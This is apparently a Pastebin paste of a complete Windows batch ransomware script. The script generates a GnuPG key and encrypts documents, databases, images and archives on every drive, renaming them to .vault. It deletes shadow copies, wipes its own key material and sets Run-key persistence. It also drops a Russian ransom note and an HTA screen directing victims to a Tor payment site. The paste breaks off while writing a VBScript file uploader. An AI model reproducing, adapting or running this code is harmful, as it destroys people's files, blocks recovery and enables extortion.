Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- яю
- @Echo off
- SetLocal EnableDelayedExpansion
- cd "%temp%"
- if not exist "%temp%\b.rr" (
- echo ok> "%temp%\b.rr"
- attrib +h "%temp%\b.rr"
- ) else (
- goto andy
- )
- chcp 866
- rename "%temp%\403.vlt" audiodg.exe
- rename "%temp%\index.vlt" svchost.exe
- rename "%temp%\iconv.vlt" iconv.dll
- set ulang=RU
- set hash1=!RANDOM!
- set hash2=!RANDOM!
- set hash3=!RANDOM!
- set hash4=!RANDOM!
- set hash5=!RANDOM!
- set fhash=!RANDOM!
- set xconf=!RANDOM!
- cd "%appdata%"
- if exist "%AppData%\gnupg" (
- rename "%AppData%\gnupg" gnupg_bak%random%
- attrib -s -h -r "%AppData%\gnupg\*.*"
- attrib -s -h -r "%AppData%\gnupg"
- del /f /q "%AppData%\gnupg\*.*"
- rmdir /s /q "%AppData%\gnupg"
- )
- cd "%temp%"
- echo Key-Type: RSA> "%temp%\gk.vlt"
- echo Key-Length: 1024>> "%temp%\gk.vlt"
- echo Name-Real: Cellar>> "%temp%\gk.vlt"
- echo Name-Comment: Cellar>> "%temp%\gk.vlt"
- echo Name-Email: v@u.lt>> "%temp%\gk.vlt"
- "%temp%\svchost.exe" --batch --homedir "%temp%" --gen-key "%temp%\gk.vlt"
- echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\pk.vlt"
- echo Version: GnuPG v1>> "%temp%\pk.vlt"
- echo.>> "%temp%\pk.vlt"
- echo mI0EVMTCdAEEALiK/XRUVtlYEgRgVsCdCGOFuuPlAayDcpq0mPXZTWX6hqkw6zJp>> "%temp%\pk.vlt"
- echo Wtq66dUSeqFq2uFD8Gf1sYGanUztuwNHGCJcZOmCEhuzwu5aDOjfgQic4iRrwzIs>> "%temp%\pk.vlt"
- echo mhXNVJ7o4iShfaVDWqJYxx2EkIakG8PefpqS57uB9Qncka+BGvu889C7ABEBAAG0>> "%temp%\pk.vlt"
- echo SFZhdWx0Q3J5cHQgKFZhdWx0Q3J5cHQpIDxCTS1OQkpheHJ0NHJpdVZyQ3E1TlZj>> "%temp%\pk.vlt"
- echo THJGQzVDWUNZa3hwbUBCaXRtZXNzYWdlPoi4BBMBAgAiBQJUxMJ0AhsDBgsJCAcD>> "%temp%\pk.vlt"
- echo AgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAW1lPUttqywK3UA/4ut/3gHWP43kANXaS1>> "%temp%\pk.vlt"
- echo BZOwrqM8jZIHM/37nKfjpyy0t7YBGJL3bvkW7R+119jXIb6A+0lJTuBYGPkaiK3w>> "%temp%\pk.vlt"
- echo iSER5Nrlkbu2Ph1i1ammIz/zZ8M12YWgLXlUYEaan7X5qKwXPsLcliAuqaL/lPyh>> "%temp%\pk.vlt"
- echo Ln9O8Y1tY7D4zm2nl5vTxnopaLiNBFTEwnQBBADZHzHXCsAqeA2LwGEVhgny8JQ+>> "%temp%\pk.vlt"
- echo 301eW/rtPzcVSq0j7vmkEO8jO8PVabkOCwflAlfZgtuFaJD49KvcQRcDPXSN2kJI>> "%temp%\pk.vlt"
- echo mvfYRflRupa7lq0LnGlOsndGbpzjjZRUHBNeUR+LQbZnRfnBpqFDIKk3/uhPFNDg>> "%temp%\pk.vlt"
- echo djrZYRLcl2tJa3V9zwARAQABiJ8EGAECAAkFAlTEwnQCGwwACgkQFtZT1LbassCL>> "%temp%\pk.vlt"
- echo 5wP+O5Js6zJT/cFYCcUuWuYs9wIng65Y+YV+y6/7p8/OTwfxazhB65fG7hdThYPt>> "%temp%\pk.vlt"
- echo 9b4dgiEBdefeDvZwAWE5CJwdAeTsJT3OuPrMq9/fRaW3gooP/sJoWRS47mQGnIiu>> "%temp%\pk.vlt"
- echo DeONVwIPHeUzrKd1+jSCHcUvbJ4stmOpSNm5mGy6Ww2DKoM=>> "%temp%\pk.vlt"
- echo =E61M>> "%temp%\pk.vlt"
- echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\pk.vlt"
- "%temp%\svchost.exe" -r Cellar --export-secret-keys --yes --homedir "%temp%" -a> "%temp%\vaultkey.vlt"
- del /f /q "%temp%\gk.vlt"
- echo.>> "%temp%\vaultkey.vlt"
- echo BDATE: !DATE!>> "%temp%\vaultkey.vlt"
- echo UNAME: !USERNAME!>> "%temp%\vaultkey.vlt"
- echo CNAME: !COMPUTERNAME!>> "%temp%\vaultkey.vlt"
- echo ULANG: !ulang!>> "%temp%\vaultkey.vlt"
- echo 01HSH: !hash1!>> "%temp%\vaultkey.vlt"
- echo 02HSH: !hash2!>> "%temp%\vaultkey.vlt"
- echo 03HSH: !hash3!>> "%temp%\vaultkey.vlt"
- echo 04HSH: !hash4!>> "%temp%\vaultkey.vlt"
- echo 05HSH: !hash5!>> "%temp%\vaultkey.vlt"
- echo FHASH: !fhash!>> "%temp%\vaultkey.vlt"
- echo chcp 866 > "%temp%\cryptlist.lst"
- FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :olist %%f
- echo if exist "%%TeMp%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%AppDATA%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 01FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- goto list2
- :olist
- dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
- echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
- echo %%i>> "%temp%\conf.list"
- )
- goto:eof
- :list2
- echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
- echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
- echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
- echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
- echo var cdp="%%TEMP%%!!()()()()()()()>%temp%\sdwrase.js"
- echo.> "%temp%\sdwrase.cmd"
- echo SetLocal EnableDelayedExpansion>> "%temp%\sdwrase.cmd"
- echo for /f "tokens=2*" %%%%i in ^('reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"'^) do set fnd7=%%%%j>> "%temp%\sdwrase.cmd"
- echo if not %%fnd7:~0,1%% GEQ 6 goto skipadm>> "%temp%\sdwrase.cmd"
- echo set ntries=^0>> "%temp%\sdwrase.cmd"
- echo :chkone>> "%temp%\sdwrase.cmd"
- echo wscript.exe //B //Nologo "%%temp%%\win.vbs"^& tasklist^|findstr /i wmic.exe>> "%temp%\sdwrase.cmd"
- echo if not ^^!errorlevel^^!==0 ^(>> "%temp%\sdwrase.cmd"
- echo set /a ntries+=^1>> "%temp%\sdwrase.cmd"
- echo if not ^^!ntries^^! GEQ 16 goto chkone>> "%temp%\sdwrase.cmd"
- echo ^)>> "%temp%\sdwrase.cmd"
- echo :skipadm>> "%temp%\sdwrase.cmd"
- echo del /f /q "%temp%\sdwrase.js">> "%temp%\sdwrase.cmd"
- echo del /f /q "%temp%\win.vbs">> "%temp%\sdwrase.cmd"
- echo echo del /f /q "%temp%\win.vbs">> "%temp%\sdwrase.cmd"
- echo echo 1 ^> "%%temp%%\sdwrase.cmd">> "%temp%\sdwrase.cmd"
- start wscript.exe //B //Nologo "%temp%\sdwrase.js"
- FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :tlist %%f
- echo if exist "%%TeMp%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%AppDATA%%\VAULT.KEY" echo 02FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 02FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- goto list3
- :tlist
- dir /B "%1:\"&& for /r "%1:\" %%i in (*.pdf *.rtf) do (
- echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
- echo %%i>> "%temp%\conf.list"
- )
- goto:eof
- :list3
- FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :flist %%f
- echo if exist "%%TeMp%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%AppDATA%%\VAULT.KEY" echo 03FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 03FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- goto list4
- :flist
- dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
- echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
- echo %%i>> "%temp%\conf.list"
- )
- goto:eof
- :list4
- FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :ylist %%f
- echo if exist "%%TeMp%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%AppDATA%%\VAULT.KEY" echo 04FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 04FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- goto list5
- :ylist
- dir /B "%1:\"&& for /r "%1:\" %%i in (*.cd *.mdb *.1cd *.dbf *.sqlite) do (
- echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
- echo %%i>> "%temp%\conf.list"
- )
- goto:eof
- :list5
- FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :qlist %%s
- echo if exist "%%TeMp%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%AppDATA%%\VAULT.KEY" echo 05FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 05FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- goto coq
- :qlist
- dir /B "%1:\"&& for /r "%1:\" %%i in (*.jpg *.zip) do (
- echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
- echo %%i>> "%temp%\conf.list"
- )
- goto:eof
- :coq
- echo echo FHASH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo echo FHASH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo echo FHASH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\cryptlist.lst"
- echo echo 1 ^> "%%TeMp%%\cryptlist.cmd">> "%temp%\cryptlist.lst"
- echo del /f /q "%%TeMp%%\cryptlist.cmd">> "%temp%\cryptlist.lst"
- findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\conf.list"> "%temp%\conf2.list"
- findstr /i /v "windows recycle program avatar roaming msoffice temporary sample themes uploads csize resource internet com_ intel common resources texture profiles library clipart manual games framework64 setupcache autograph maps amd64 cache support guide abbyy application thumbnails avatars template adobe" "%temp%\cryptlist.lst"> "%temp%\cryptlist2.lst"
- findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\conf2.list"> "%temp%\confclean.list"
- findstr /v "AppData APPDATA appdata temp TEMP Temp" "%temp%\cryptlist2.lst"> "%temp%\cryptlist.cmd"
- del /f /q "%temp%\conf2.list"
- del /f /q "%temp%\cryptlist2.lst"
- del /f /q "%temp%\conf.list"
- del /f /q "%temp%\cryptlist.lst"
- echo XCONF: !xconf!>> "%temp%\vaultkey.vlt"
- set xquan=66668
- for /f %%f in ('find /c /v ""^< "%temp%\confclean.list"') do (
- set xquan=%%f
- )
- echo QNTTY: !xquan!>> "%temp%\vaultkey.vlt"
- for %%c IN (01:xls 04:doc 05:rtf 10:pdf 11:psd 12:dwg 13:cdr 19:cd 20:mdb 21:1cd 23:dbf 24:sqlite 26:jpg 27:zip) do (
- for /f "tokens=1,2 delims=:" %%i in ("%%c") do (
- for /f %%b in ('find /c /i ".%%j"^< "%temp%\confclean.list"') do (
- echo %%iEXT: %%b>> "%temp%\vaultkey.vlt"
- )))
- echo 02EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 03EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 06EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 07EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 08EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 09EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 14EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 15EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 16EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 17EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 18EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 22EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 25EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 28EXT: 0 >> "%temp%\vaultkey.vlt"
- echo 29EXT: 0 >> "%temp%\vaultkey.vlt"
- echo.>> "%temp%\confclean.list"
- echo XCONF: !xconf!>> "%temp%\confclean.list"
- "%temp%\svchost.exe" --import "%temp%\pk.vlt"
- del /f /q "%temp%\pk.vlt"
- "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\VAULT.KEY" -e "%temp%\vaultkey.vlt"
- "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always -o "%temp%\CONFIRMATION.KEY" -e "%temp%\confclean.list"
- if not exist "%temp%\VAULT.KEY" (
- "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\vaultkey.vlt"
- rename "%temp%\vaultkey.vlt.gpg" VAULT.KEY
- )
- if not exist "%temp%\CONFIRMATION.KEY" (
- "%temp%\svchost.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\confclean.list"
- rename "%temp%\confclean.list.gpg" CONFIRMATION.KEY
- )
- if not exist "%temp%\VAULT.KEY" (
- del /f /q "%temp%\*.vlt"
- del /f /q "%temp%\*.gpg"
- del /f /q "%temp%\random_seed"
- del /f /q "%temp%\*.lock"
- del /f /q "%temp%\*.bak"
- del /f /q "%temp%\*.list"
- goto pwsnd
- )
- echo.>> "%temp%\VAULT.KEY"
- echo 01FNSH-!hash1!>> "%temp%\VAULT.KEY"
- echo 02FNSH-!hash2!>> "%temp%\VAULT.KEY"
- echo 03FNSH-!hash3!>> "%temp%\VAULT.KEY"
- echo 04FNSH-!hash4!>> "%temp%\VAULT.KEY"
- echo 05FNSH-!hash5!>> "%temp%\VAULT.KEY"
- echo FHASH-!fhash!>> "%temp%\VAULT.KEY"
- "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\secring.gpg"
- "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\vaultkey.vlt"
- "%temp%\audiodg.exe" /accepteula -p 16 -q "%temp%\confclean.list"
- if exist "%temp%\secring.gpg" (
- for %%k in ("%temp%\secring.gpg") do (
- fsutil file setzerodata offset=0 length=%%~zk "%%k"
- )
- echo !random!!random!!random!> "%temp%\secring.gpg"
- del /f /q "%temp%\secring.gpg"
- for %%a in ("%temp%\vaultkey.vlt") do (
- fsutil file setzerodata offset=0 length=%%~za "%%a"
- )
- echo !random!!random!!random!> "%temp%\vaultkey.vlt"
- del /f /q "%temp%\vaultkey.vlt"
- for %%q in ("%temp%\confclean.list") do (
- fsutil file setzerodata offset=0 length=%%~zq "%%q"
- )
- echo !random!!random!!random!> "%temp%\confclean.list"
- del /f /q "%temp%\confclean.list"
- del /f /q "%temp%\secring.gpg"
- del /f /q "%temp%\vaultkey.vlt"
- del /f /q "%temp%\conf.list"
- )
- del /f /q "%temp%\random_seed"
- del /f /q "%temp%\trustdb.gpg"
- del /f /q "%temp%\secring.gpg"
- del /f /q "%temp%\*.lock"
- del /f /q "%temp%\*.bak"
- attrib -s -h -r "%AppData%\gnupg\*.*"
- attrib -s -h -r "%AppData%\gnupg"
- del /f /q "%AppData%\gnupg\*.*"
- rmdir /s /q "%AppData%\gnupg"
- set vaultbak=!random!
- copy /y "%temp%\CONFIRMATION.KEY" "%appdata%\CONFIRMATION.KEY"
- copy /y "%temp%\VAULT.KEY" "%appdata%\VAULT.KEY"
- copy /y "%temp%\VAULT.KEY" "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo 01FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo 02FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo 03FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo 04FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo 05FNSH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- echo FHASH-OK>> "%temp%\!vaultbak!BAK_VAULT.KEY"
- attrib +s +r "%temp%\!vaultbak!BAK_VAULT.KEY"
- copy /y "%temp%\VAULT.KEY" "%userprofile%\Desktop\VAULT.KEY"
- echo.> "%temp%\VAULT.txt"
- echo Ваши рабочие документы и базы данных были зашифрованы и переименованы в формат .vault>> "%temp%\VAULT.txt"
- echo Для их восстановления необходимо получить уникальный ключ>> "%temp%\VAULT.txt"
- echo.>> "%temp%\VAULT.txt"
- echo ПРОЦЕДУРА ПОЛУЧЕНРРЇ КЛЮЧА: >> "%temp%\VAULT.txt"
- echo.>> "%temp%\VAULT.txt"
- echo РљР РђРўРљРћ>> "%temp%\VAULT.txt"
- echo 1. Зайдите на наш веб-ресурс>> "%temp%\VAULT.txt"
- echo 2. Гарантированно получите Ваш ключ>> "%temp%\VAULT.txt"
- echo 3. Восстановите файлы в прежний вид>> "%temp%\VAULT.txt"
- echo.>> "%temp%\VAULT.txt"
- echo ДЕТАЛЬНО>> "%temp%\VAULT.txt"
- echo Шаг 1:>> "%temp%\VAULT.txt"
- echo Скачайте Tor браузер с официального сайта: https://www.torproject.org>> "%temp%\VAULT.txt"
- echo Шаг 2:>> "%temp%\VAULT.txt"
- echo Рспользуя Tor браузер посетите сайт: http://restoredz4xpmuqr.onion>> "%temp%\VAULT.txt"
- echo Шаг 3:>> "%temp%\VAULT.txt"
- echo Найдите Ваш уникальный VAULT.KEY на компьютере - это Ваш ключ к личной клиент-панели. Не потеряйте его>> "%temp%\VAULT.txt"
- echo Авторизируйтесь на сайте используя ключ VAULT.KEY>> "%temp%\VAULT.txt"
- echo Перейдите в раздел FAQ и ознакомьтесь с дальнейшей процедурой>> "%temp%\VAULT.txt"
- echo STEP 4:>> "%temp%\VAULT.txt"
- echo После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё>> "%temp%\VAULT.txt"
- echo.>> "%temp%\VAULT.txt"
- echo ДОПОЛНРТЕЛЬНО>> "%temp%\VAULT.txt"
- echo a^) Вы не сможете восстановить файлы без уникального ключа ^(который безопасно хранится на нашем сервере^)>> "%temp%\VAULT.txt"
- echo b^) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке >> "%temp%\VAULT.txt"
- echo c^) Ваша стоимость восстановления не окончательная>> "%temp%\VAULT.txt"
- echo.>> "%temp%\VAULT.txt"
- echo Дата блокировки: %date% ^(%time:~0,5%^)>> "%temp%\VAULT.txt"
- copy /y "%temp%\VAULT.txt" "%userprofile%\Desktop\vault.txt"
- echo var cdp="%%TEMP%%!!()()()()()()()>>%temp%\revault.js"
- "%TEMP%\svchost.exe" --import "%TEMP%\pubring.gpg"
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tnotify" /t REG_SZ /f /d "notepad %temp%\VAULT.txt"
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltexec" /t REG_SZ /f /d "wscript //B //Nologo %temp%\revault.js"
- call "%temp%\cryptlist.cmd"
- echo ^<html^>^<head^>^<hta:application BORDER = "none" CAPTION = "No" CONTEXTMENU = "Yes" INNERBORDER = "No" MAXIMIZEBUTTON = "No" MINIMIZEBUTTON = "No" NAVIGABLE = "No" SCROLL = "No" SCROLLFLAT = "No" SELECTION = "Yes" SHOWINTASKBAR = "No" SINGLEINSTANCE = "Yes" SYSMENU = "No"/^>^<style^>body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAgMAAADUJKRdAAAACVBMVEXs7Ozv7+/6+vqH/Ct2AAAAW0lEQVQI11WOsQ2DABADv8gAGQFd4SJTZARGQC5cMBX1T0mD4ClP9lmutf71qW/t3d19VBLDcrNR7KV+F4Mx28OKyMzf/UDINvYADR9A08cwfcnjDwmarOBn7wSqEUpFZuJdBQAAAABJRU5ErkJggg==)}.vault{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:40px;width:900px;padding:20px;background-color:#7a7a7a;color:#FF4C4C;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 45px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:21px}^</style^>^<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/^>^<title^>Vault Notification^</title^>^<script language="vbscript"^>> "%temp%\VAULT.hta"
- echo sub Window_Onload>> "%temp%\VAULT.hta"
- echo window.resizeTo 1280,725>> "%temp%\VAULT.hta"
- echo screenWidth = Document.ParentWindow.Screen.AvailWidth>> "%temp%\VAULT.hta"
- echo screenHeight = Document.ParentWindow.Screen.AvailHeight>> "%temp%\VAULT.hta"
- echo posLeft = (screenWidth - 1280) / 2 >> "%temp%\VAULT.hta"
- echo posTop = (screenHeight - 725) / 2 >> "%temp%\VAULT.hta"
- echo window.moveTo posLeft, posTop >> "%temp%\VAULT.hta"
- echo end sub >> "%temp%\VAULT.hta"
- echo ^</script^>^</head^>^<body scroll="no"^>^<div class="vault"^>^<div class="sc"^>Ваши документы Рё базы данных были зашифрованы Рё помещены РІ^<br^>^☢^ ^<b^>формат .VAULT^</b^>^ ^☢^</div^>^<div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;"^>Для РёС… восстановления необходимо получить ^<b^>Ваш ключ^</b^>^</div^>^<br^>^<div class="briefly"^>^<div class="bti"^>^<b^>Кратко:^</b^>^</div^>^<div class="sced"^>Необходимо произвести 3 шага:^<hr^> ^➠ Зайдите РЅР° наш веб-ресурс^<br^> ^Ⓑ Получите СЃРІРѕР№ ключ^<br^>^⤷ ^<b^>Восстановите файлы^</b^>^</div^>^</div^>^<div class="detailed"^>^<div class="bti"^>^<b^>Детально:^</b^>^</div^>^<div class="sced"^>Скачайте ^<b^>Tor^</b^> браузер СЃ РѕС„. сайта ^<form action="http://dist.torproject.org/torbrowser/4.0.3/torbrowser-install-4.0.3_en-US.exe"^>^<input class="dbutt" type="submit" value="⇣ Загрузить"^>^</form^>^<form action="http://torproject.org/projects/torbrowser.html.en#windows"^>^<input class="dbutt" type="submit" value="Help" style="padding-bottom:1px;"^>^</form^>^<hr^>Зайдите РЅР° наш сайт ^<b^>используя Tor^</b^>:^<br^>^<div class="bti" style="margin:1px 8%%;padding:0px;cursor:text;"^>http://restoredz4xpmuqr.onion^</div^>^<form action="http://pastebin.com/rs7jZ0TW"^>^<input class="dbutt" type="submit" value="РќРµ работает?"^>^ ^⤴^</form^>^<hr^>^<div class="fnl"^>Авторизируйтесь ^ ^➤^ ^<b^>Получите гарантии^</b^> ^ ^➤^ Ключ^</div^>^</div^>^<div class="footer"^>^<b^>Note 1:^</b^> Р’С‹ РЅРµ сможете восстановить файлы без уникального ключа.^</div^>^<div class="footer"^>^<b^>Note 2:^</b^> Перед авторизацией, Р’С‹ ^<u^>должны^</u^> найти Ваш ^<b^>VAULT.KEY^</b^> РЅР° компьютере.^</div^>^<div class="footer"^>^<b^>Note 3: Стоимость полного восстановления РЅР° ресурсе РЅРµ окончательная^</div^>^</div^>^</body^>^</html^>>> "%temp%\VAULT.hta"
- copy /y "%temp%\VAULT.hta" "%appdata%\VAULT.hta"
- copy /y "%temp%\VAULT.hta" "%userprofile%\Desktop\VAULT.hta"
- del /f /q "%temp%\cryptlist.cmd"
- attrib +h "%appdata%\VAULT.hta"
- attrib +r +s "%temp%\VAULT.KEY"
- attrib +r +s "%appdata%\VAULT.KEY"
- attrib +r +s "%userprofile%\Desktop\VAULT.KEY"
- :pwsnd
- echo do_vbsUpload > "%temp%\up.vbs"
- echo Sub do_vbsUpload^(^) >> "%temp%\up.vbs"
- echo Dim FileName,DestURL,FieldName >> "%temp%\up.vbs"
- echo FieldName="FileField" >> "%temp%\up.vbs"
- echo Dim aCounter,Arg >> "%temp%\up.vbs"
- echo aCounter=1 >> "%temp%\up.vbs"
- echo For Each Arg In WScript.Arguments >> "%temp%\up.vbs"
- echo Select Case aCounter >> "%temp%\up.vbs"
- echo Case 1: FileName=Arg >> "%temp%\up.vbs"
- echo Case 2: DestURL=Arg >> "%temp%\up.vbs"
- echo Case 3: FieldName=Arg >> "%temp%\up.vbs"
- echo End Select >> "%temp%\up.vbs"
- echo aCounter=aCounter+1 >> "%temp%\up.vbs"
- echo Next >> "%temp%\up.vbs"
- echo UploadFile DestURL,FileName,FieldName >> "%temp%\up.vbs"
- echo End Sub >> "%temp%\up.vbs"
- echo Sub UploadFile^(DestURL,FileName,FieldName^) >> "%temp%\up.vbs"
- echo Const Boundary="---------------------------0123456789012" >> "%temp%\up.vbs"
- echo Dim FileContents,FormData >> "%temp%\up.vbs"
- echo FileContents=GetFile^(FileName^) >> "%temp%\up.vbs"
- echo FormData=BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\up.vbs"
- echo IEPostBinaryRequest DestURL,FormData,Boundary >> "%temp%\up.vbs"
- echo End Sub >> "%temp%\up.vbs"
- echo Function BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\up.vbs"
- echo Dim FormData,Pre,Po >> "%temp%\up.vbs"
- echo Const ContentType="application/upload" >> "%temp%\up.vbs"
- echo Pre="--"+Boundary+vbCrLf+mpFields^(FieldName,FileName,ContentType^) >> "%temp%\up.vbs"
- echo Po=vbCrLf+"--"+Boundary+"--"+vbCrLf >> "%temp%\up.vbs"
- echo Const adLongVarBinary=205 >> "%temp%\up.vbs"
- echo Dim RS: Set RS=CreateObject^("ADODB.Recordset"^) >> "%temp%\up.vbs"
- echo RS.Fields.Append "b",adLongVarBinary,Len^(Pre^)+LenB^(FileContents^)+Len^(Po^) >> "%temp%\up.vbs"
- echo RS.Open >> "%temp%\up.vbs"
- echo RS.AddNew >> "%temp%\up.vbs"
- echo Dim LenData >> "%temp%\up.vbs"
- echo LenData=Len^(Pre^) >> "%temp%\up.vbs"
- echo RS^("b"^).AppendChunk^(StringToMB^(Pre^) ^& ChrB^(0^)^) >> "%temp%\up.vbs"
- echo Pre=RS^("b"^).GetChunk^(LenData^) >> "%temp%\up.vbs"
